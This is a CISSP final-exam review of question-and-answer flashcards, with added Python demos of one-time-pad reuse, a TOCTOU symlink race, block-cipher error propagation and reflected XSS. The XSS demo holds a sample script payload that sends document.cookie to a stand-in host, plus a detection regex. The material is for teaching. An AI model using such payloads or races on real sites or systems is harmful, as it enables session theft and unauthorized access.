CISSP Final Exam Review

What are the stages in the TCP/IP model? - Correct Answer- "NITA": Network Interface, Internet, Transport, Application
How do you convert from OSI to TCP/IP layers? - Correct Answer- "3-1-1-2", starting from the top of the OSI model: Application, Presentation and Session map to the TCP/IP Application layer; Transport to Transport; Network to Internet; Data Link and Physical to Network Interface
How many EALs are there in Common Criteria? - Correct Answer- 7
List the EALs in Common Criteria - Correct Answer- "For Sure, My Mother, So Sweet Forever": EAL1 Functionally tested, EAL2 Structurally tested, EAL3 Methodically tested and checked, EAL4 Methodically designed, tested and reviewed, EAL5 Semiformally designed and tested, EAL6 Semiformally verified design and tested, EAL7 Formally verified design and tested
What are the four stages of fire? - Correct Answer- "I'm So Freaking Hot": Incipient, Smoke, Flame, Heat
What type of extinguisher should you use on combustible metals (Class D)? - Correct Answer- Dry powder
How many layers are in the ring model? - Correct Answer- Four: rings 0, 1, 2 and 3 (ring 0 is the kernel, ring 3 is user mode)
EU-US Privacy Shield (what does it entail) - Correct Answer- "NCASDAR (3 are long)": Notice, Choice, Accountability for Onward Transfer, Security, Data Integrity and Purpose Limitation, Access, Recourse/Enforcement/Liability. Successor to Safe Harbor; invalidated by the CJEU in July 2020 (Schrems II), but still appears on exams
XOR - Correct Answer- Same = 0, Different = 1. Equivalent to subtracting the two bits and taking the absolute value: different bits give |1 - 0| = 1, identical bits give 0. XORing with the same key twice returns the original value, which is why XOR underlies stream ciphers and the one-time pad
GDPR/OECD privacy principles - Correct Answer- "CDPU-SOIA-R": Collection Limitation, Data Quality, Purpose Specification, Use Limitation, Security Safeguards, Openness, Individual Participation, Accountability (the eight OECD principles), plus GDPR's Right to Be Forgotten (right to erasure)
ISC2 Code of Ethics canons - Correct Answer- There are 4, in priority order: Protect society, the common good, necessary public trust and confidence, and the infrastructure; Act honorably, honestly, justly, responsibly and legally; Provide diligent and competent service to principals; Advance and protect the profession
Software maturity models (often filed under SDLC) - Correct Answer- "If I Don't Run, All Might Lose Out". The mnemonic interleaves two models: the five SW-CMM maturity levels (Initial, Repeatable, Defined, Managed, Optimizing) and the IDEAL model phases (Initiating, Diagnosing, Establishing, Acting, Learning). Neither is the SDLC itself
System and System Security Engineering (NIST SP 800-160) process groups - Correct Answer- "T-TEA": Technical, Technical Management, Enabling (organizational project-enabling), Agreement
How many control types? What are they? - Correct Answer- 3: Physical, Technical/Logical, Administrative/Managerial
How many control categories? - Correct Answer- 7: Deterrent, Preventive, Detective, Corrective, Recovery, Compensating, Directive
Describe SOX - Correct Answer- Sarbanes-Oxley: can't lie to investors; a defense against fraudulent accounting practices. Section 302: C-level officers can go to jail for falsely certifying financial reports. Section 404: internal-control auditing requirements
What are some asymmetric ciphers? - Correct Answer- "DEREK": Diffie-Hellman, ElGamal, RSA, Elliptic Curve Cryptography (ECC), Knapsack (Merkle-Hellman, long since broken)
What are some symmetric ciphers? - Correct Answer- "23BRAIDS": Twofish, 3DES, Blowfish, RC5, AES, IDEA, DES, SAFER
What type of biometric scanning is most intrusive? - Correct Answer- Retinal ("retANAL" as the memory aid): it shines light into the back of the eye and can reveal medical conditions
What security premise does the 4th Amendment support? - Correct Answer- Privacy (protection against unreasonable search and seizure)
What is the formula for the number of symmetric keys needed for n parties? - Correct Answer- n(n-1)/2
What is the formula for the number of ASYMMETRIC keys needed for n parties? - Correct Answer- 2n (one key pair per party)
What are the different key sizes of AES? - Correct Answer- 128, 192, 256 bits (the block size is always 128 bits)
X.509 - Correct Answer- The most widely accepted format for digital certificates, defined by the International Telecommunication Union (ITU)
WEP - Correct Answer- Wired Equivalent Privacy: the original 802.11 encryption, based on RC4 with weak IV handling. CRACKED, do not use; replaced by WPA and WPA2
POP3 (Post Office Protocol version 3) - Correct Answer- A protocol used for retrieving email from a mailbox on the mail server; usually deletes the email from the server once it is downloaded to the user's inbox. TCP port 110, or 995 over TLS
WPA - Correct Answer- Wi-Fi Protected Access: interim replacement for WEP that uses TKIP (still RC4 underneath), not AES
WPA2 - Correct Answer- Wi-Fi Protected Access 2 (802.11i): uses AES-CCMP
What is the most common network topology? - Correct Answer- Star
FM-200 - Correct Answer- "Fairly Magical" gas (HFC-227ea); most likely to be used in a data center; harms neither computer equipment nor people; no residue or costly cleanup
RAM - Correct Answer- Primary storage; volatile (contents lost at power-off)
Vernam Cipher - Correct Answer- One-time pad: plaintext XORed with a truly random key at least as long as the message and used only once; the only provably unbreakable cipher when those conditions hold
Can most network IDSs tell if attacks are successful? - Correct Answer- No; an NIDS sees the attempt on the wire, not the outcome on the host
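The XOR and Vernam cipher items above are easier to trust with the arithmetic in hand. The following Python is an added example for this review and is not part of the original study notes: it implements a one-time pad with XOR and then shows the failure mode the "one-time" in the name is about. Reusing the pad lets an attacker XOR the two ciphertexts together, cancel the pad out, and recover plaintext from a guessed fragment (a "crib"). The two messages, the crib and the offset are constructed sample data; the function names are mine.

```python
# Added example (not from the original study notes): the Vernam cipher /
# one-time pad, and why the pad must never be reused.
import secrets


def xor_bytes(a: bytes, b: bytes) -> bytes:
    """XOR two equal-length byte strings (same bit -> 0, different bit -> 1)."""
    if len(a) != len(b):
        raise ValueError("inputs must be the same length")
    return bytes(x ^ y for x, y in zip(a, b))


def otp_encrypt(plaintext: bytes, pad: bytes) -> bytes:
    """Vernam cipher: ciphertext = plaintext XOR pad. The pad must be truly
    random, at least as long as the message, and used exactly once."""
    if len(pad) < len(plaintext):
        raise ValueError("pad must be at least as long as the plaintext")
    return xor_bytes(plaintext, pad[:len(plaintext)])


# Decryption is the same operation, because (P XOR K) XOR K == P.
otp_decrypt = otp_encrypt


def two_time_pad_leak(c1: bytes, c2: bytes) -> bytes:
    """If one pad encrypts two messages, XORing the ciphertexts cancels the
    pad and yields P1 XOR P2. The attacker never needs the key."""
    n = min(len(c1), len(c2))
    return xor_bytes(c1[:n], c2[:n])


def recover_with_crib(p1_xor_p2: bytes, crib: bytes, offset: int) -> bytes:
    """Given P1 XOR P2 and a guessed fragment (crib) of P1 at `offset`,
    recover the corresponding bytes of P2."""
    segment = p1_xor_p2[offset:offset + len(crib)]
    return xor_bytes(segment, crib)


def demo() -> tuple:
    """Returns (P1 XOR P2 as seen by the attacker, bytes of P2 recovered from a crib)."""
    # Constructed sample messages; the pad comes from a CSPRNG.
    p1 = b"ATTACK AT DAWN"
    p2 = b"RETREAT AT 1AM"
    pad = secrets.token_bytes(len(p1))

    c1 = otp_encrypt(p1, pad)
    c2 = otp_encrypt(p2, pad)            # pad reuse: the mistake being shown
    assert otp_decrypt(c1, pad) == p1    # correct use round-trips

    leak = two_time_pad_leak(c1, c2)
    # The attacker guesses that message 1 ends with " AT DAWN" (offset 6) and
    # reads the matching bytes of message 2 without ever seeing the pad.
    recovered = recover_with_crib(leak, b" AT DAWN", 6)
    return leak, recovered


if __name__ == "__main__":
    leak, recovered = demo()
    print("P1 xor P2:", leak.hex())
    print("recovered from message 2:", recovered)
```

The recovered bytes are `b"T AT 1AM"`: everything the second message contained at the positions where the first message was guessed correctly. This is exactly why stream ciphers that reuse a key and nonce fail the same way.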
Candidate Key - Correct Answer- An attribute (or set of attributes) that uniquely identifies each row in a table and could therefore serve as the primary key; a table can have several candidate keys, one of which is chosen as the primary key
Primary Key - Correct Answer- A field (or group of fields) that uniquely identifies a given entity in a table
Foreign Key - Correct Answer- A primary key of one table that appears as an attribute in another table and provides a logical relationship between the two tables (referential integrity)
DevOps - Correct Answer- Development, Quality Assurance and Operations working as one team
VAST - Correct Answer- Visual, Agile and Simple Threat modeling ("Very Agile Seeming Threat" as a memory aid); used in Agile
MTD/MAD - Correct Answer- Maximum Tolerable/Allowable Downtime: the longest an outage can last before the business suffers permanent failure
OpenID Connect - Correct Answer- Authentication layer built on top of OAuth 2.0 (OAuth 2.0 itself handles authorization); widely used for cloud and federated sign-on
How many steps are in the Waterfall model? - Correct Answer- 7
Parol Evidence Rule - Correct Answer- Written agreements take precedence over oral agreements; a written contract can only be changed in writing
Best Evidence Rule - Correct Answer- A copy is not admissible if the original is available
TOC/TOU Attack - Correct Answer- Time-of-check/time-of-use, a race condition: the attacker changes the resource between the moment it is checked and the moment it is used. Mitigate by making the check and the use a single atomic operation (take a lock, or open the object once and validate the handle you hold rather than re-resolving the name)
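The TOC/TOU item above is the one model on this page that is easiest to misunderstand without seeing it happen. The Python below is an added example for this review, not code from the original study notes: a file reader that checks a path and then opens the path again, an attacker who swaps the file for a symlink inside that window, and a hardened reader that opens once and validates the descriptor it holds. The race window is simulated in-process by a callback, the files are constructed in a temporary directory, and the example assumes a POSIX system (symlinks and `O_NOFOLLOW`).

```python
# Added example (not from the original study notes): a time-of-check /
# time-of-use race on a file path, and the fix of validating the object you
# actually opened instead of re-resolving the name. POSIX-only.
import errno
import os
import stat
import tempfile


def vulnerable_read(path: str, attacker_window=None) -> bytes:
    """Check the path, then open the path again. Whatever changes the path
    between the two steps (here simulated by attacker_window) is used
    without ever having been checked."""
    if os.path.islink(path):                         # time of check
        raise PermissionError("symlinks not allowed")
    if attacker_window is not None:
        attacker_window()                            # the race window
    with open(path, "rb") as f:                      # time of use
        return f.read()


def hardened_read(path: str) -> bytes:
    """Open once, then validate the descriptor with fstat. There is no second
    path lookup, so there is no window in which the name can be swapped."""
    fd = os.open(path, os.O_RDONLY | os.O_NOFOLLOW)  # refuses a symlink outright
    try:
        st = os.fstat(fd)
        if not stat.S_ISREG(st.st_mode):
            raise PermissionError("not a regular file")
        with os.fdopen(fd, "rb") as f:
            fd = None                                # fdopen now owns the descriptor
            return f.read()
    finally:
        if fd is not None:
            os.close(fd)


def demo() -> tuple:
    """Returns (hardened read before the attack, what the vulnerable reader
    leaked, whether the hardened reader refused the swapped path)."""
    with tempfile.TemporaryDirectory() as d:
        secret = os.path.join(d, "secret")           # file the user must not read
        target = os.path.join(d, "target")           # file the user asked for
        with open(secret, "wb") as f:
            f.write(b"SECRET")
        with open(target, "wb") as f:
            f.write(b"public")

        before = hardened_read(target)               # legitimate use works

        def swap_target_for_symlink():
            # Attacker replaces the already-checked file with a link to the secret.
            os.remove(target)
            os.symlink(secret, target)

        leaked = vulnerable_read(target, attacker_window=swap_target_for_symlink)

        # The hardened reader sees the symlink the attacker left behind and
        # fails closed instead of following it.
        try:
            hardened_read(target)
            refused = False
        except OSError as e:
            refused = e.errno in (errno.ELOOP, errno.EMLINK) or isinstance(e, PermissionError)
        return before, leaked, refused


if __name__ == "__main__":
    before, leaked, refused = demo()
    print("hardened reader on the real file:", before)
    print("vulnerable reader returned:", leaked)
    print("hardened reader refused the swapped path:", refused)
```

The vulnerable reader returns `b"SECRET"` even though its symlink check passed, because the check and the open resolved the name at different times. The hardened version has nothing to re-check: the `fstat` runs on the descriptor that will be read.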
Agile Software Development - Correct Answer- "High Autonomy, High Alignment" ("Hippy Dippy"): uses VAST threat modeling and the Scrum methodology; values simplicity, face-to-face conversation, working software and SELF-ORGANIZING, team-led development
RAID 0 - Correct Answer- Striping only, no redundancy; fast; 2+ drives; losing any drive loses the array
RAID 1 - Correct Answer- Mirroring, no striping; redundancy; exactly 2 drives
RAID 5 - Correct Answer- Striping with distributed parity; can lose one drive; 3+ drives
RAID 6 - Correct Answer- Striping with double distributed parity; can lose two drives; 4+ drives
RAID 1+0 (RAID 10) - Correct Answer- Striped mirrors: speed plus redundancy; 4+ drives; survives one drive failure per mirror pair (two failures only if they fall in different pairs)
Private IP Ranges (RFC 1918) - Correct Answer- 10.0.0.0 - 10.255.255.255 (10/8); 172.16.0.0 - 172.31.255.255 (172.16/12); 192.168.0.0 - 192.168.255.255 (192.168/16). 224.0.0.0 - 239.255.255.255 is the multicast range (Class D), not a private range
RADIUS - Correct Answer- Open (non-proprietary) AAA protocol; UDP; encrypts only the password in the access request, not the rest of the packet
XTACACS - Correct Answer- Extended TACACS, an OLD Cisco-proprietary AAA protocol (like RADIUS)
TACACS - Correct Answer- Original Cisco-proprietary AAA protocol (like RADIUS)
TACACS+ - Correct Answer- Current Cisco-proprietary AAA protocol (like RADIUS); TCP; encrypts the entire packet body; separates authentication, authorization and accounting; supports multifactor authentication
Worms - Correct Answer- Self-propagating malware: spreads on its own without user interaction
Can non-US citizens hold US patents? - Correct Answer- Yes
Copyright - Correct Answer- Life of the author plus 70 years
Patent - Correct Answer- 20 years from the filing date
Fuzz Testing - Correct Answer- A software testing technique that deliberately provides invalid, unexpected or random data as input to a program and watches for crashes, hangs and failed assertions
Risk = - Correct Answer- Threat x Vulnerability (fuller formulations also multiply by impact or asset value)
Pass-Around Review - Correct Answer- Asynchronous code review; reviewers comment independently
Fagan Review (Fagan Inspection) - Correct Answer- Formal, multi-step process (planning, overview, preparation, inspection, rework, follow-up) involving everyone together
Steganography - Correct Answer- Hides data inside another file (for example a picture)
Civilian Classifications - Correct Answer- Confidential/Proprietary, Private, Sensitive, Public
Government Classifications (damage if exposed) - Correct Answer- Top Secret (exceptionally grave damage), Secret (serious damage), Confidential (damage)
Info Sec Program OWNER should be... - Correct Answer- As senior as possible while still able to FOCUS on INFOSEC (likely not the CEO)
FISMA - Correct Answer- Federal Information Security Management Act; applies to federal agencies and their contractors
Graham-Denning - Correct Answer- Model defining eight primitive protection rights: create/delete subject, create/delete object, and read/grant/delete/transfer access right
James Anderson - Correct Answer- Reference Monitor (Anderson Report, 1972)
Harrison-Ruzzo-Ullman - Correct Answer- Access Control Matrix model; extends Graham-Denning to describe how rights are created, granted and removed
If there is no "I" in the model's name it is most likely NOT what kind of model? - Correct Answer- Integrity (Biba and Clark-Wilson are the integrity models)
Biba - Correct Answer- Integrity (no read down, no write up)
Bell-LaPadula - Correct Answer- Confidentiality; MAC; mathematical state-machine model (no read up, no write down)
Clark-Wilson - Correct Answer- Integrity; well-formed transactions and separation of duties; subjects reach objects only through trusted programs (the access triple)
Brewer-Nash - Correct Answer- "Chinese Wall": prevents conflicts of interest; access rights change dynamically based on what the subject has already accessed; used where one firm serves competing clients
Block Cipher Modes (does a ciphertext error propagate?) - Correct Answer-
Block mode - ECB - No propagation (but identical plaintext blocks produce identical ciphertext blocks, so it leaks patterns; avoid)
Block mode - CBC - Propagates: the damaged block and the following block
Stream mode - CFB - Propagates: the damaged block and the following block
Stream mode - OFB - No propagation (the keystream is independent of the ciphertext, so only the damaged bits are wrong)
Stream mode - CTR - No propagation
Private Cloud - Correct Answer- Used by only ONE organization
Null Cipher - Correct Answer- No algorithm; hides plaintext inside other plaintext (a form of steganography)
Asset Classification is Driven Primarily By... - Correct Answer- Asset value
Where do you go when you are Recovering? - Correct Answer- To the backup site; recover "over"
Where do you go when you are Restoring? - Correct Answer- To the original site; restore "back"
What order do you RECOVER business processes? - Correct Answer- From highest to lowest priority
What order do you RESTORE business processes? - Correct Answer- From lowest to highest priority (least critical first, so the primary site is proven before critical processes move back)
What is the first step in auditing source code? - Correct Answer- Match "as-built" to "as-designed"
Reference Monitor vs. Security Kernel - Correct Answer- The reference monitor is the abstract concept (mediates every access by a subject to an object; must be tamper-proof, always invoked and small enough to verify); the security kernel is the hardware, firmware and software that implements it. Exam questions often treat the two terms as interchangeable
What is the biggest concern with mobile devices? - Correct Answer- Loss of confidential data. Guard against this by minimizing the amount of data stored on such devices (plus full-device encryption and remote wipe)
What are some hashes? - Correct Answer- SHA family (SHA-1, SHA-2, SHA-3) and MD5. MD5 and SHA-1 are broken for collision resistance and must not be used for signatures or certificates
ECC - Correct Answer- Elliptic Curve Cryptography
What type of asymmetric algorithm is commonly used in mobile devices? - Correct Answer- ECC: equivalent strength with much shorter keys and less computation
Accreditation - Correct Answer- Management's formal acceptance of the risk of bringing a system into the organization (follows certification, the technical evaluation)
What are the four fastest types of storage on a PC? - Correct Answer- "RCRS" ("RC Racing Speed"): Register, Cache, RAM, Swap space
What is the best (water) fire suppression system for computer equipment? - Correct Answer- Pre-action
Cross-Site Scripting (XSS) - Correct Answer- An attack that injects script into web content the server sends to other users, so the script runs in the victims' browsers with the site's origin. Combat with server-side input validation and contextual output encoding
Where should input validation be placed? - Correct Answer- On the web server; client-side checks can be bypassed and are only a convenience
Data Diddling - Correct Answer- Tampering with data as it is entered into or stored in data tables
Phlashing - Correct Answer- Permanent denial of service (PDoS): malicious or corrupt code flashed into BIOS or firmware, bricking the device
Port Address Translation (PAT) - Correct Answer- Many private addresses share one public address; each connection is tracked by port number together with the client's private address
Community Cloud - Correct Answer- Two or more organizations with shared concerns pool their resources
Take-Grant Protection Model - Correct Answer- Rules: Take, Grant, Create, Remove
How do you monitor traffic between two VMs on the same host? - Correct Answer- Use a virtual port (port mirroring on the virtual switch) feeding a virtual IDS; traffic between co-located VMs never crosses a physical NIC, so a physical sensor cannot see it
Lightweight Directory Access Protocol (LDAP) - Correct Answer- Open-standard protocol used by client applications to query and modify a directory service (X.500-based); TCP 389, or 636 over TLS (LDAPS)
Metasploit - Correct Answer- Open-source penetration-testing framework that combines scanners, known exploits and payloads; users can write their own modules
Decentralized Access Control - Correct Answer- Access decisions are made by the people closest to the users, such as department managers; there is no single centralized entity processing access requests
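The block-cipher-mode table above is the item students most often get backwards, so here is an added example for this review (not code from the original study notes) that measures error propagation directly. It flips one ciphertext bit under ECB, CBC, CFB, OFB and CTR and reports which plaintext blocks come back wrong. To keep the file standard-library only, the block cipher is a toy 64-bit Feistel network built on SHA-256; it is a stand-in for AES and has no security value, but the five mode constructions are the real ones. `KEY`, `IV` and the sample message are constructed.

```python
# Added example (not from the original study notes): how a single flipped
# ciphertext bit propagates under ECB, CBC, CFB, OFB and CTR. The block cipher
# is a toy Feistel network on SHA-256 so the file runs with the standard
# library only; the mode constructions themselves are the real ones.
import hashlib

BLOCK = 8                           # toy block size in bytes (AES uses 16)
HALF = BLOCK // 2
KEY = b"constructed-demo-key"       # constructed sample key
IV = bytes(range(BLOCK))            # constructed sample IV / nonce


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def _round(key: bytes, half: bytes, rnd: int) -> bytes:
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:HALF]


def enc_block(key: bytes, block: bytes) -> bytes:
    """4-round Feistel permutation: invertible, so ECB and CBC can decrypt."""
    l, r = block[:HALF], block[HALF:]
    for rnd in range(4):
        l, r = r, _xor(l, _round(key, r, rnd))
    return l + r


def dec_block(key: bytes, block: bytes) -> bytes:
    l, r = block[:HALF], block[HALF:]
    for rnd in reversed(range(4)):
        l, r = _xor(r, _round(key, l, rnd)), l
    return l + r


def _blocks(data: bytes) -> list:
    assert len(data) % BLOCK == 0, "demo uses whole blocks, no padding"
    return [data[i:i + BLOCK] for i in range(0, len(data), BLOCK)]


def _counter_block(nonce: bytes, i: int) -> bytes:
    return nonce[:HALF] + i.to_bytes(HALF, "big")


def encrypt(mode: str, key: bytes, iv: bytes, pt: bytes) -> bytes:
    out, prev = [], iv
    for i, p in enumerate(_blocks(pt)):
        if mode == "ECB":
            c = enc_block(key, p)
        elif mode == "CBC":
            c = enc_block(key, _xor(p, prev)); prev = c
        elif mode == "CFB":
            c = _xor(p, enc_block(key, prev)); prev = c
        elif mode == "OFB":
            prev = enc_block(key, prev); c = _xor(p, prev)
        elif mode == "CTR":
            c = _xor(p, enc_block(key, _counter_block(iv, i)))
        else:
            raise ValueError(mode)
        out.append(c)
    return b"".join(out)


def decrypt(mode: str, key: bytes, iv: bytes, ct: bytes) -> bytes:
    """Only ECB and CBC use the inverse cipher; CFB, OFB and CTR run the
    forward cipher to make a keystream, which is why they are 'stream modes'."""
    out, prev = [], iv
    for i, c in enumerate(_blocks(ct)):
        if mode == "ECB":
            out.append(dec_block(key, c))
        elif mode == "CBC":
            out.append(_xor(dec_block(key, c), prev)); prev = c
        elif mode == "CFB":
            out.append(_xor(c, enc_block(key, prev))); prev = c
        elif mode == "OFB":
            prev = enc_block(key, prev); out.append(_xor(c, prev))
        elif mode == "CTR":
            out.append(_xor(c, enc_block(key, _counter_block(iv, i))))
        else:
            raise ValueError(mode)
    return b"".join(out)


def damaged_blocks(mode: str, pt: bytes, byte_index: int) -> list:
    """Flip one ciphertext bit at byte_index and report which plaintext
    blocks decrypt incorrectly."""
    ct = bytearray(encrypt(mode, KEY, IV, pt))
    ct[byte_index] ^= 0x01
    recovered = decrypt(mode, KEY, IV, bytes(ct))
    return [i for i, (a, b) in enumerate(zip(_blocks(pt), _blocks(recovered))) if a != b]


def propagation_table(pt: bytes, byte_index: int) -> dict:
    return {m: damaged_blocks(m, pt, byte_index) for m in ("ECB", "CBC", "CFB", "OFB", "CTR")}


if __name__ == "__main__":
    sample = b"block00!block01!block02!block03!"   # constructed 4-block message
    for mode, bad in propagation_table(sample, 12).items():   # flip lands in block 1
        print(f"{mode}: corrupted blocks {bad}")
```

Flipping a bit in block 1 corrupts block 1 only under ECB, OFB and CTR, and blocks 1 and 2 under CBC and CFB. The same harness also shows the ECB pattern leak: two identical plaintext blocks encrypt to two identical ciphertext blocks.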
Service Provisioning Markup Language (SPML) - Correct Answer- OASIS open standard (XML-based) for exchanging user, resource and service provisioning information between cooperating organizations, for example creating and removing accounts
Bastion Host - Correct Answer- A heavily hardened, single-purpose host that is exposed to the untrusted network, usually placed on a screened subnet (DMZ) or directly outside the firewall; it is expected to be attacked, so it runs nothing it does not need
Ingress - Correct Answer- Incoming traffic
Egress - Correct Answer- Outgoing traffic
Hearsay Rule - Correct Answer- "You can't testify about what someone else told you." Logs and other records handed to you are hearsay unless the person who collected them (for example the administrator) testifies to how they were generated and kept, which brings them under the business-records exception
EAP (Extensible Authentication Protocol) - Correct Answer- An authentication framework (not a single method) used in PPP and 802.1X that carries many authentication types, including certificates, smart cards, hardware tokens and biometrics such as fingerprint scanners
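The XSS and input-validation items above say where the controls go but not what they look like. The Python below is an added example for this review, not code from the original study notes: a server-side template that reflects a query parameter unchanged, the same template with contextual output encoding, and an allow-list validator for a field with a known shape. The `PAYLOAD` string, the `USERNAME_RE` pattern and the detector function are constructed for the demo.

```python
# Added example (not from the original study notes): reflected XSS in a
# server-side template, server-side allow-list validation, and the output
# encoding that neutralises script injection in the HTML-body context.
import html
import re

# Constructed attacker input: what a "search" parameter might carry.
PAYLOAD = '<script>document.location="https://evil.example/?c="+document.cookie</script>'

# Allow-list for a username field: letters, digits, _ . - and a length cap.
USERNAME_RE = re.compile(r"[A-Za-z0-9_.-]{1,32}")


def render_vulnerable(query: str) -> str:
    """Echoes the untrusted value straight into HTML: the browser runs the script."""
    return f"<p>Results for: {query}</p>"


def render_safe(query: str) -> str:
    """Output encoding for the HTML-body context. quote=True also encodes
    quotes, which matters when the value lands inside an attribute."""
    return f"<p>Results for: {html.escape(query, quote=True)}</p>"


def username_is_valid(value: str) -> bool:
    """Allow-list check: only the characters the field is supposed to contain."""
    return USERNAME_RE.fullmatch(value) is not None


def validate_username(value: str) -> str:
    """The server-side check. A copy in browser JavaScript is a convenience
    for users, not a security control, because the client can skip it."""
    if not username_is_valid(value):
        raise ValueError("username contains disallowed characters")
    return value


def contains_active_html(page: str) -> bool:
    """Crude detector for the demo: a raw <script tag or an on*= event handler."""
    return re.search(r"<script|\son\w+\s*=", page, re.IGNORECASE) is not None


def demo() -> tuple:
    """Returns (vulnerable page carries active script, encoded page carries active script)."""
    return (contains_active_html(render_vulnerable(PAYLOAD)),
            contains_active_html(render_safe(PAYLOAD)))


if __name__ == "__main__":
    print(render_vulnerable(PAYLOAD))
    print(render_safe(PAYLOAD))
    print("active script in vulnerable/safe output:", demo())
```

Validation rejects input that has no business containing `<` or `"`; encoding handles the free-text fields where such characters are legitimate. Both run on the server, and the encoding is chosen per output context (HTML body here; attribute, JavaScript and URL contexts each need their own).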